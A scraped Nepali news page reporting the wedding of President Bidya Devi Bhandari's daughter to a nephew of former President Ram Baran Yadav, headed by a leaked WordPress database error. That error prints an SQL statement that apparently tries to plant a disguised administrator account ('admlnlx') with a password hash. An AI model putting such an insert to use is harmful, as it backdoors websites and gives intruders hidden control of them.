WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUYq.7wEo7/1qMXiaiFwDW2pHfutEc/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 19:35:02', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २ –
शीतल निवासमा केही दिनदेखि विवाहको चटारो छ । राष्ट्रपति विद्यादेवि भण्डारीकी कान्छी छोरी निशाकुसुमको विवाह छ। उनको विवाहको लगन सोमबार जुराइएको छ।
निशाकुसुमको गणतन्त्र नेपालको पहिलो राष्ट्रपति रामवरण यादवका भतिजा अभिशेकसँग विवाह हुन लागेको हो । दुलाहा बन्न लागेका अभिशेक पूर्वराष्ट्रपति यादवकी भतिजी एवम् महोत्तरीबाट निर्वाचित सांसद किरण यादवका छोरा हुन् । दुई महिनाअघि नै दुईबीच शीतल निवासमा इन्गेजमेन्ट भएको थियो ।कान्तिपुर दैनिकमा खबर छ ।